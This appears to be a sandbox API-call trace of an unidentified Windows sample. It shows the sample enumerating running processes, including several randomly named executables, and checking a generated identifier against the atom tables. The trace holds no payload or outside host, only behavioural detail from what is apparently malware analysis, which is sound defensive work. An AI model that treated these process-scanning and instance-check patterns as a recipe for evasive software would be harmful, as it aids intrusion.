	[0133.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0133.098] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.098] CloseHandle (hObject=0x2dc) returned 1
	[0133.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.099] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetLastError () returned 0x5
	[0133.100] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.101] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0133.101] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.101] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.102] GetLastError () returned 0x5
	[0133.103] GetLastError () returned 0x5
	[0133.103] GetLastError () returned 0x5
	[0133.103] GetLastError () returned 0x5
	[0133.103] GetLastError () returned 0x5
	[0133.103] GetLastError () returned 0x5
	[0133.103] GetLastError () returned 0x5
	[0133.103] GetLastError () returned 0x5
	[0133.103] GetLastError () returned 0x5
	[0133.103] GetLastError () returned 0x5
	[0133.103] GetLastError () returned 0x5
	[0133.103] GetLastError () returned 0x5
	[0133.103] GetLastError () returned 0x5
	[0133.103] GetLastError () returned 0x5
	[0133.103] GetLastError () returned 0x5
	[0133.103] GetLastError () returned 0x5
	[0133.103] GetLastError () returned 0x5
	[0133.103] GetLastError () returned 0x5
	[0133.103] GetLastError () returned 0x5
	[0133.103] GetLastError () returned 0x5
	[0133.103] GetLastError () returned 0x5
	[0133.103] GetLastError () returned 0x5
	[0133.103] GetLastError () returned 0x5
	[0133.103] GetLastError () returned 0x5
	[0133.103] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.103] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0133.103] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.104] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0133.110] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0133.110] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0133.111] CloseHandle (hObject=0x2dc) returned 1
	[0133.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0133.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.111] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.111] CloseHandle (hObject=0x2dc) returned 1
	[0133.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.112] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.112] CloseHandle (hObject=0x2dc) returned 1
	[0133.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.112] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.112] CloseHandle (hObject=0x2dc) returned 1
	[0133.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.113] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.113] CloseHandle (hObject=0x2dc) returned 1
	[0133.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0133.113] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.113] CloseHandle (hObject=0x2dc) returned 1
	[0133.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16d28) returned 0xc0000004
	[0133.144] VirtualAlloc (lpAddress=0x0, dwSize=0x16e28, flAllocationType=0x3000, flProtect=0x4) returned 0x3c30000
	[0133.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c30000, Length=0x16e28, ResultLength=0x0 | out: SystemInformation=0x3c30000, ResultLength=0x0) returned 0x0
	[0133.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0133.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0133.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.150] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.150] CloseHandle (hObject=0x2dc) returned 1
	[0133.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.151] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.151] CloseHandle (hObject=0x2dc) returned 1
	[0133.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0133.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.151] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.151] CloseHandle (hObject=0x2dc) returned 1
	[0133.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.152] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.152] CloseHandle (hObject=0x2dc) returned 1
	[0133.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.152] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.152] CloseHandle (hObject=0x2dc) returned 1
	[0133.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.153] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.153] CloseHandle (hObject=0x2dc) returned 1
	[0133.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.153] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.153] CloseHandle (hObject=0x2dc) returned 1
	[0133.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.154] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.154] CloseHandle (hObject=0x2dc) returned 1
	[0133.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.154] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.154] CloseHandle (hObject=0x2dc) returned 1
	[0133.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.155] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.155] CloseHandle (hObject=0x2dc) returned 1
	[0133.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.155] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.155] CloseHandle (hObject=0x2dc) returned 1
	[0133.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.155] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.155] CloseHandle (hObject=0x2dc) returned 1
	[0133.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.156] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.156] CloseHandle (hObject=0x2dc) returned 1
	[0133.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0133.156] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.156] CloseHandle (hObject=0x2dc) returned 1
	[0133.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0133.157] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.157] CloseHandle (hObject=0x2dc) returned 1
	[0133.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.157] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.157] CloseHandle (hObject=0x2dc) returned 1
	[0133.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.157] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.158] CloseHandle (hObject=0x2dc) returned 1
	[0133.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.158] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.158] CloseHandle (hObject=0x2dc) returned 1
	[0133.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.158] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.158] CloseHandle (hObject=0x2dc) returned 1
	[0133.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.159] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.159] CloseHandle (hObject=0x2dc) returned 1
	[0133.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.159] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.159] CloseHandle (hObject=0x2dc) returned 1
